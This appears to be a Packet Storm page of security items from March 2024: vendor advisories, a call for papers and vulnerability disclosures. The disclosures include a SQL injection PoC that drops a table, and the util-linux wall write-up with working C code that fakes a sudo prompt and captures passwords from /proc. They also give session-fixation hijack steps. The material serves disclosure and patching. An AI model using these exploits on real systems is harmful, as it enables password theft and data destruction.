Red Hat Security Advisory 2024-1570-03 - Updated images are now available for Red Hat Advanced Cluster Security. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1570.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: ACS 4.4 enhancement and security update  
Advisory ID:        RHSA-2024:1570-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1570  
Issue date:         2024-03-29  
Revision:           03  
CVE Names:          CVE-2019-25210  
====================================================================

Summary: 

Important: Updated images are now available for Red Hat Advanced Cluster Security.

Description:

Updated images are now available for Red Hat Advanced Cluster Security. The  
updated image includes new features and bug fixes.

This release includes the following features and updates:

* New Compliance capabilities (Technology Preview)  
* Network graph enhancements for internal entities  
* Build-time network policy tools is now generally available  
* Init-bundle graphical user interface improvements  
* eBPF CO-RE collection method enabled by default  
* Bring your own database for RHACS Central is now generally available  
* Support RHACS on ROSA hosted control plane  
* Life cycle updates  
* Integration with Red Hat OpenShift Cluster Manager and Paladin Cloud to discover unsecured clusters  
* Migration to stock Red Hat OpenShift SCCs during manual upgrade by using roxctl CLI  
* Cluster discovery by using cloud source integrations  
* Short-lived API tokens for Central  
* Enhanced roxctl deployment check command  
* Authentication of AWS and GCP integrations by using short-lived tokens (Technology Preview)  
* Scanner V4 that uses upstream ClairCore (Technology Preview)  
* Filter workload CVEs by using component and component source

For more information, including bug fix descriptions, see https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html.

Security fixes:  
* golang: net/http: insufficient sanitization of Host header (CVE-2023-29406)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)  
* helm: Missing YAML content leads to panic (CVE-2024-26147)  
* helm: Shows secrets with --dry-run option in clear text (CVE-2019-25210)

Solution:

CVEs:

CVE-2019-25210

References:

https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html  
https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2222167  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://issues.redhat.com/browse/ROX-23399

Red Hat Security Advisory 2024-1570-03

Ubuntu Security Notice 6715-1 - It was discovered that unixODBC incorrectly handled certain bytes. An attacker could use this issue to execute arbitrary code or cause a crash.

==========================================================================  
Ubuntu Security Notice USN-6715-1  
March 27, 2024

unixodbc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

unixODBC could be made to crash or execute arbitrary code.

Software Description:  
- unixodbc: Basic ODBC tools

Details:

It was discovered that unixODBC incorrectly handled certain bytes.  
An attacker could use this issue to execute arbitrary code or cause  
a crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  libodbc2                        2.3.12-1ubuntu0.23.10.1  
  unixodbc                        2.3.12-1ubuntu0.23.10.1

Ubuntu 22.04 LTS:  
  libodbc1                        2.3.9-5ubuntu0.1  
  libodbc2                        2.3.9-5ubuntu0.1  
  unixodbc                        2.3.9-5ubuntu0.1

Ubuntu 20.04 LTS:  
  libodbc1                        2.3.6-0.1ubuntu0.1  
  unixodbc                        2.3.6-0.1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libodbc1                        2.3.4-1.1ubuntu3+esm1  
  unixodbc                        2.3.4-1.1ubuntu3+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  libodbc1                        2.3.1-4.1ubuntu0.1~esm2  
  unixodbc                        2.3.1-4.1ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6715-1  
  CVE-2024-1013

Package Information:  
  https://launchpad.net/ubuntu/+source/unixodbc/2.3.12-1ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/unixodbc/2.3.9-5ubuntu0.1  
  https://launchpad.net/ubuntu/+source/unixodbc/2.3.6-0.1ubuntu0.1

Ubuntu Security Notice USN-6715-1

Ubuntu Security Notice 6719-1 - Skyler Ferrante discovered that the util-linux wall command did not filter escape sequences from command line arguments. A local attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6719-1  
March 27, 2024

util-linux vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

util-linux could be made to expose sensitive information.

Software Description:  
- util-linux: miscellaneous system utilities

Details:

Skyler Ferrante discovered that the util-linux wall command did not filter  
escape sequences from command line arguments. A local attacker could  
possibly use this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   util-linux                      2.39.1-4ubuntu2.1

Ubuntu 22.04 LTS:  
   util-linux                      2.37.2-4ubuntu3.3

Ubuntu 20.04 LTS:  
   util-linux                      2.34-0.1ubuntu9.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6719-1  
   CVE-2024-28085

Package Information:  
   https://launchpad.net/ubuntu/+source/util-linux/2.39.1-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/util-linux/2.37.2-4ubuntu3.3  
   https://launchpad.net/ubuntu/+source/util-linux/2.34-0.1ubuntu9.5

Ubuntu Security Notice USN-6719-1

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Wireshark Analyzer 4.2.4

Event Management version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Event Management - SQL Injection# Application: Event Management# Date: 19.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://github.com/PuneethReddyHC# Software Link: https://github.com/PuneethReddyHC/event-management# Version:1.0# Attack Type: Remote# Tested on: Windows 10 64 bit Wampserver # About project:helps to register an users for on events conducted in college fests with simple logic with secured way## Vulnerability Details:- **Application Name**: Event Management- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)# Vulnerable code section:# https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64<?php// ... (other code)if(empty($full_name)  || empty($email)  || empty($mobile)) {    // Error messages and actions for incomplete data} else {    if(!preg_match($name,$full_name)){        // Error messages and actions for invalid full name    }    // Additional regex checks for email and mobile format    // Verifying mobile number length    if(!(strlen($mobile) == 10)){        // Error message and action for invalid mobile number length    }    // Database insertion operation    $sql = "INSERT INTO `participants`             (`p_id`,`event_id`, `fullname`, `email`,              `mobile`,  `college`, `branch`)             VALUES (NULL,'$event_id', '$full_name',  '$email',              '$mobile', '$college', '$branch')";                if(mysqli_query($con,$sql)){        // Successful registration message        echo "register_success";        echo "<script> location.href='index.php'; </script>";        exit;    }}// ... (other code)?># Vulnerability Description:The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, making it susceptible to various forms of attacks such as cross-site scripting (XSS) and potential security risks.# Proof of Concept (PoC):SQL Injection:The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is directly used in the SQL query without proper validation or parameterization:An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.PoC:POST /event-management-master/backend/register.php HTTP/1.1Host: localhostevent_id=1'; DROP TABLE participants; --This could result in a SQL query like:INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`,  `college`, `branch`) VALUES (NULL,'1'; DROP TABLE participants; --', 'test', 'test@gmail.com', '0555555555', 'asd', 'qwe')To mitigate this, use prepared statements or parameterized queries to ensure proper sanitization of user inputs.

Event Management 1.0 SQL Injection

The util-linux wall command does not filter escape sequences from command line arguments. The vulnerable code was introduced in commit cdd3cc7fa4 (2013). Every version since has been vulnerable. This allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and wall is setgid. CentOS is not vulnerable since wall is not setgid. On Ubuntu 22.04 and Debian Bookworm, wall is both setgid and mesg is set to y by default.

Wall-Escape (CVE-2024-28085)

Skyler Ferrante: Escape sequence injection in util-linux wall

=================================================================  
Summary  
=================================================================

The util-linux wall command does not filter escape sequences from  
command line arguments. The vulnerable code was introduced in  
commit cdd3cc7fa4 (2013). Every version since has been  
vulnerable.

This allows unprivileged users to put arbitrary text on other  
users terminals, if mesg is set to y and wall is setgid. CentOS  
is not vulnerable since wall is not setgid. On Ubuntu 22.04 and  
Debian Bookworm, wall is both setgid and mesg is set to y by  
default.

If a system runs a command when commands are not found, with the  
unknown command as an argument, the unknown command will be  
leaked. This is true of Ubuntu 22.04. Debian Bookworm does not  
leak unknown commands in its starting configuration.

On Ubuntu 22.04, we have enough control to leak a users password  
by default. The only indication of attack to the user will be an  
incorrect password prompt when they correctly type their  
password, along with their password being in their command  
history.

On other systems that allow wall messages to be sent, an attacker  
may be able to alter the clipboard of a victim. This works on  
windows-terminal, but not on gnome-terminal.

=================================================================  
Analysis  
=================================================================

When displaying inputs from stdin, wall uses the function  
fputs_careful in order to neutralize escape characters.

Unfortunately, wall does not do the same for input coming from  
argv.

term-utils/wall.c (note that mvec is argv)  
```  
/*  
* Read message from argv[]  
*/  
int i;

for (i = 0; i < mvecsz; i++) {  
  fputs(mvec[i], fs);  
  if (i < mvecsz - 1)  
          fputc(' ', fs);  
}  
fputs("\r\n", fs);  
...

/*  
 * Read message from stdin.  
 */  
while (getline(&lbuf, &lbuflen, stdin) >= 0)  
        fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);  
```

Since argv is attacker controlled, and can contain binary data,  
this is exploitable. A simple PoC command:

        wall $(printf "\033[33mHI")

If you are vulnerable, this should show a broadcast with "HI"  
being yellow. If we instead run:

        echo $(printf "\033[33mHI") | wall

This should fail with "^[[33m" showing up before our message.

To make sure the PoC will work, make sure your victim user can  
actually receive messages. First check that mesg is set to y  
(`mesg y`). If a user does not have mesg turned on, they are not  
exploitable.

If you still can't receive messages, try running `su user` or  
accessing the machine through SSH. Note that just because you  
can't receive messages without first going through su/SSH, does  
not mean a user is not vulnerable.  
=================================================================  
Exploitation  
=================================================================

Most distros allow argument data to be seen by unprivileged  
users, and some distros run commands when commands are not found.  
We can use this to leak a users password by tricking them into  
giving their password as a command to run.

When I run the command xsnow in my terminal, I get the following  
output:  
```  
Command 'xsnow' not found, but can be installed with:  
sudo apt install xsnow  
```

Lets look at what new processes are created when I do this:  
```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- xsnow  
/usr/bin/snap advise-snap --format=json --command xsnow  
```

This is on Ubuntu, but similar commands exist on other systems.

As a simple demonstration let's create a fake sudo prompt for  
gnome-terminal, and then spy on /proc/$pid/cmdline.

fake sudo prompt:  
```  
#include<stdio.h>  
#include<unistd.h>

int main(){  
        char* argv[] = {"prog",  
                "\033[3A" // Move up 3  
                "\033[K"  // Delete prompt  
                "[sudo] password for a_user:"  
                "\033[?25l"  
                // Set forground RGB (48,10,36)  
                //      hide typing  
                "\033[38;2;48;10;36m",  
        NULL};

        char* envp[] = {NULL};

        execve("/usr/bin/wall", argv, envp);  
}  
```

cmdline spy:  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>

#define USLEEP_TIME 2000

int main(){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();

                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        int num = atoi(d_name);

                        if(num > current_max_pid){  
                                next_max_pid = num;  
                        }else{  
                                continue;  
                        }

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\n';

                        write(1, buf, ra);  
                }  
                current_max_pid = next_max_pid;  
                closedir(proc_dir);  
        }  
}  
```

If we run the cmdline spy and the sudo password prompt, the user  
may input their password as a command. It will look like the  
following on Ubuntu:

```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!  
/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!  
```

Some distros, like Debian, do not seem to have a command like  
command-not-found by default. There does not seem to be a way to  
leak a users password in this case then, even though we can send  
escape sequences to them.

This works, but the user has no reason to expect a password page  
at this point. Now that we have shown some exploitability, lets  
try and make it better.

Imagine we run the cmdline spy in one terminal, and then in  
another terminal we run `sudo systemctl status cron.service`.  
The spy will see the sudo process first, and then after the user  
types their password correctly they will see `systemctl status  
cron.service`.

```  
sudo systemctl status cron.service  
systemctl status cron.service  
```

An attacker could inject a password incorrect message as soon as  
the second process starts (password correct). The user will  
assume they typed their password incorrectly and enter it again.

watch for certain command  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>  
#include<string.h>

#define USLEEP_TIME 3000

int main(int argc, char** argv){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        if(argc != 2){  
                printf("Usage: prog search_string\n");  
                return 1;  
        }

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();  
                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\0';

                        // Check if proces is us  
                        if(strstr(buf, argv[0])){  
                                continue;  
                        }  
                        // Check against search string  
                        if(!strcmp(buf, argv[1])){  
                                write(1, buf, ra);  
                                write(1, "\n", 1);  
                                return 0;  
                        }  
                }  
                closedir(proc_dir);  
        }  
}  
```

Imagine our new spy code was compiled as watch, and our wall  
exploit was called throw.

We can now run:  
```  
./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";  
sleep .1; ./throw  
```

The first two commands will wait until the user runs

        sudo systemctl start sshd

and correctly types their password for sudo. Then our wall  
exploit sends our fake sudo prompt. We need to sleep for a short  
duration to make sure we cover up the command prompt.

During this process, we need to make sure our original spy code  
is logging all cmdline arguments, to recover the victims password

Example log from original spy:  
```  
./watch sudo systemctl start sshd  
sudo systemctl start sshd  
./watch systemctl start sshd  
systemctl start sshd  
bash  
./throw  
bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword  
/usr/bin/snap advise-snap --format=json --command SuperStrongPassword  
```

Now lets imagine a different style of attack. An attacker can  
change a users clipboard through escape sequences on some  
terminals. For example, windows-terminal supports this. Gnome  
terminal does not.

```  
#include<stdio.h>

int main(){  
        printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");  
}  
```

Since we can send escape sequences through wall, if a user is  
using a terminal that supports this escape sequence, an attacker  
can change the victims clipboard to arbitrary text.

Further references:  
  https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt  
  https://github.com/skyler-ferrante/CVE-2024-28085

util-linux wall Escape Sequence Injection

The 13th International Workshop on Cyber Crime, or IWCC, 2024 call for papers has been announced. It will take place July 30th through August 2nd, 2024 in Vienna, Austria.

    [APOLOGIES FOR CROSS-POSTING]CALL FOR PAPERS13th International Workshop on Cyber Crime (IWCC 2024 -https://www.ares-conference.eu/iwcc/)to be held in conjunction with the 19th International Conference onAvailability, Reliability and Security (ARES 2024 -http://www.ares-conference.eu) July 30 - August 02, 2024, Vienna, AustriaIMPORTANT DATESSubmission Deadline  May 12, 2024Author Notification  May 29, 2024Proceedings Version  June 18, 2024Conference    July 30 - August 02, 2024WORKSHOP DESCRIPTIONThe societies of today's world are becoming increasingly dependent on onlineservices, where commercial activities, business transactions, governmentservices and biomedical diagnostics are realized. This tendency has beenevident during the recent COVID-19 pandemic. These developments, along withthe growing number of military conflicts worldwide (Ukraine, Israel, etc.),have led to the fast development of new cyber threats and numerousinformation security issues that are exploited by cybercriminals. Theinability to provide trusted, secure services in contemporary computernetwork technologies has a tremendous socio-economic impact on globalenterprises as well as individuals.Moreover, the frequently occurring international frauds impose the necessityto conduct investigations spanning multiple domains and countries. Suchexamination is often subject to different jurisdictions and legal systems. Agood illustration of the above is the Internet, which has made it easier toprepare and perpetrate traditional - but now cyber-enabled - crimes. It hasacted as an alternate avenue for criminals to conduct their activities andlaunch attacks with relative anonymity, a high degree of deniability, andthe opportunity to operate in a border-agnostic environment. Worryingdevelopments in the abuse of artificial intelligence and machine learningtechnologies lead to the increased capabilities of malign actors wholeverage these tools to design and propagate disinformation, which isespecially dangerous (and effective) during emergencies and crises of allkinds. The developments in Generative Artificial Intelligence have alsoenabled the increase of criminal capabilities in the production,dissemination, and weaponization of high-quality, convincing fake contact(text, audio, images, and videos), which translates not only to the truthand trust decay among the affected societies but also to the enhancedcapabilities in orchestrating the sophisticated cyber crimes. Furthermore, nowadays, the majority of life-science-based techniques andresulting data hinge on information technologies. Despite their considerableadvantages, dependence on cyber technologies also exposes vulnerabilities.Various threats in the digital realm could target biomedical systems,leading to adverse consequences. The field of CyberBioSecurity wasestablished to assist bio-related sciences in comprehending potential cyberthreats and formulating defense approaches, recovery protocols, andresilience strategies. The increased complexity of communications and thenetworking infrastructure is making the investigation of these new types ofcrimes difficult. Traces of illegal digital activities are difficult toanalyze due to large volumes of data. Nowadays, the digital crime scenefunctions like any other network, with dedicated administrators functioningas the first responders. This poses new challenges for law enforcement and intelligence communitiesand forces computer societies to utilize digital forensics to combat theincreasing number of cybercrimes. Forensic professionals must be fullyprepared to be able to provide court-admissible evidence. To make thesegoals achievable, forensic techniques should keep pace with newtechnologies. Prevention, mitigation, and interdiction of new and emergingthreats necessitates an increasingly thorough and multidisciplinaryapproaches, but also requires the collaboration of all relevant actors andstakeholders in designing the technology regulation and cyber governancemeasures.The aim of this workshop is to bring together the research outcomes providedby researchers from academia and the industry. The other goal is to show thelatest research results in digital forensics and cyberbiosecurity amongstothers. We strongly encourage prospective authors to submit articlespresenting both theoretical approaches and practical case reviews, includingwork-in-progress reports.TOPICS OF INTEREST INCLUDE, BUT ARE NOT LIMITED TO:- Big Data analytics helping to track cybercrimes- Protecting Big Data against cybercrimes- Crime-as-a-service- Criminal abuse of clouds and social networks- Criminal to criminal (C2C) communications- Criminal to victim (C2V) communications- Criminal use of IoT, e.g., IoT-based botnets- Cyberbiosecurity- Cybercrime-related investigations- Cybercrimes: evolution, new trends and detection- Darknets and hidden services- Fake (incl. deepfake) and disinformation detection- Generative Artificial Intelligence and cyber crime- AI-enabled crime and terrorism- Mobile malware- Network anomaly detection- Network traffic analysis, traceback and attribution- Incident response, investigation and evidence handling- Internet governance- Novel techniques in exploit kits- Political and business issues related to digital forensics andanti-forensic - techniques- Anti-forensic techniques and methods- Identification, authentication and collection of digital evidence- Integrity of digital evidence and live investigations- Privacy issues in digital forensics- Ransomware: evolution, functioning, types, etc.- Steganography/steganalysis and covert/subliminal channels- Technology regulation- Novel applications of information hiding in networks- Watermarking and intellectual property theft- Weaponization of information - cyber-enhanced disinformation campaignsWORKSHOP CHAIRSArtur Janicki, Warsaw University of Technology, Poland; Kacper Gradoñ, Warsaw University of Technology, Poland;Katarzyna Kamiñska, Warsaw University of Technology, PolandSUBMISSION GUIDELINESThe submission guidelines valid for the workshop are the same as for theARES conference. They can be found athttps://www.ares-conference.eu/authors-area.

IWCC 2024 Call For Papers

The server in Circontrol Raption versions through 5.11.2 has a pre-authentication stack-based buffer overflow that can be exploited to gain run-time control of the device as root. The pwrstudio web application of EV Charger (in the server in Circontrol Raption through 5.6.2) is vulnerable to OS command injection.

Circontrol EV Charger vulnerabilities.

1. CVE-2020-8006 Pre-Auth Stack Based Buffer Overflow  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10)

The server in Circontrol Raption through 5.11.2 has a pre-authentication  
stack-based buffer overflow that can be exploited to gain run-time control  
of the device as root.

When the server parses the HTTP headers and finds the Basic-Authentication  
tag it will call a base64 decode function. This function takes 3 arguments:  
an input pointer, an output pointer and a length. During the authentication  
flow, the input pointer can be an attacker controlled string of  
approximately 4096 characters, and the output pointer is located on the  
stack, the length argument is 512. While the length of the stack based  
buffer is passed to the decoder it only verifies that it is not smaller than  
3.

[Vendor of Product]

https://circontrol.com/

[Affected Product Code Base]

Raption Server - Raption up to 5.11.2

[Affected Component]

OCCP 1.5, OCCP.1.6, PWRSTUDIO

[Attack Type]

Remote

[Impact Code execution]

true

[Impact Denial of Service]

true

[Attack Vectors]

Remote

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Abert Spruyt, Alex Salvetti, Dariusz Gońda

[Reference]

https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/

2. CVE-2020-8007 - Command injection (RCE/authenticated)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L (9.1)

The pwrstudio web application of EV Charger (in the server in Circontrol  
Raption through 5.6.2) is  
vulnerable to OS command injection via three fields of the configuration  
menu for ntpserver0, ntpserver1, and pingip.

[VulnerabilityType Other]

Command Injection

[Vendor of Product]

https://circontrol.com/

[Affected Product Code Base]

Raption Server - up to 5.6.2

[Affected Component]

pwrstudio

[Attack Type]

Remote

[Impact Code execution]

true

[Attack Vectors]

To exploit this issue authorization is required.

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Abert Spruyt, Alex Salvetti, Dariusz Gońda

[Reference]

https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/

Circontrol Raption Buffer Overflow / Command Injection

FusionPBX suffers from a session fixation vulnerability.

*Vulnerability Name - *Application is Vulnerable to Session Fixation

*Vulnerable URL: *www.fusionpbx.com

*Overview of the Vulnerability*  
Session fixation is a security vulnerability that occurs when an attacker  
sets or fixes a user's session identifier, manipulating the authentication  
process. Typically exploited in web applications, this vulnerability allows  
the attacker to force a user's session ID to a known value, granting  
unauthorized access. Attackers can initiate the attack by tricking users  
into using a provided session ID or by planting a session ID through  
various means.

*Steps to Reproduce*  
Step 1: To reproduce this vulnerability open two browsers. Copy "PHPSESSID"  
cookie from Browser 1 and paste it to Browser 2.  
Step 2: Login in Browser 1 using valid credentials.  
Step 3: Navigate to Browser 2 and refresh the page or open this URL (  
https://www.fusionpbx.com/app/account/home.php)  
Step 4: Successfully logged in Browser 2 without entering the credentials.

*Impact of Vulnerability:*  
Anyone can easily hijack victims or user's sessions and get into his account  
. Cookie stealing is the best way the hacker can get into account.. it  
would not take more than 5 min to steal someone's cookie using PHP and all  
.....  
Even friends can fool the victim and get him hacked...

*Mitigation:*Manage sessions properly. This problem is mainly faced because  
the session doesn't get expired or doesn't get closed when logout is  
pressed. Each time the user logins the cookie must hold a unique different  
session-id to proceed.

------------------------------------------------------------------------------------------------------

*FusionPBX Development Team Implemented Fix GitHub Commit Links:*  
https://github.com/fusionpbx/fusionpbx/commit/50220d7a0674fae944a1e16fab7a8517cdc51a9e  
https://github.com/fusionpbx/fusionpbx/commit/560a51cff710df12c863de53c4c8289e1516dae8

FusionPBX Session Fixation

Apple Security Advisory 03-25-2024-1 - Safari 17.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-1 Safari 17.4.1

Safari 17.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214094.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebRTC  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

Safari 17.4.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPKcACgkQX+5d1TXa  
IvpFfBAAvnUeX8jpQu9uS+hiv0FKFu/YUSafIVOutV2ls8jQbdd3HVKwIRNmTZ4g  
0u7drE/D9mTBMzfmvdyNKk4lrnsvgJYNgurGPudpqDr7LmzkDdn0DOWL5xxSs7Jx  
ekUxjtHiPtEPMs41gs9ZZMHiMhU/r6G9LaTa2WrRcrBeqkLnepmee9RfrSbXDV5q  
NMGio6W95JWgRLM0+c06Jk/A6VhnrxwqFug9NMDXr/EgxxMjG5mxZKY7qXXUcWe+  
D2CI/1SRI0ucAkIKN5IDFY5X4Y/XWvp8YeVqdtQQ6RmfJDEE9zPRFSlr/PKRFnba  
LfEPFzWCDMZ6qqP9eSph7+8wFLngWwksf0O9xBq6KF+LUqIVb9RkJ1VZnYZluTt4  
tT161H0aTHOq9LhcFbAA5kQbdpfX7aulYq1xkaGz1a2KJxYFmr1p26Q7HMWHw5Zz  
BlnRH4xsQkoKaU96WSylDUdO5DYiQ27cRQddvqP40xIOTaK/SBTUlEYDCviU+8Xs  
1KhLmuSgfnra+akn0vCmy5tu/+DzlmUT4kvJsvcOApDyKtoeSzPUYucw65RrcEo3  
Aa/3eT3R8o9S8mdq6c3OIEF16/2IyxT9fJJE0YeQTli8zmkTu0Pw0RG2DzQhnfI6  
lDKmfx3c1PyCOU3By0XIfqsI9t3oWXcvbAgSgnDC6lmnZ7X2KpY=  
=JCdc  
-----END PGP SIGNATURE-----

Source

Packet Storm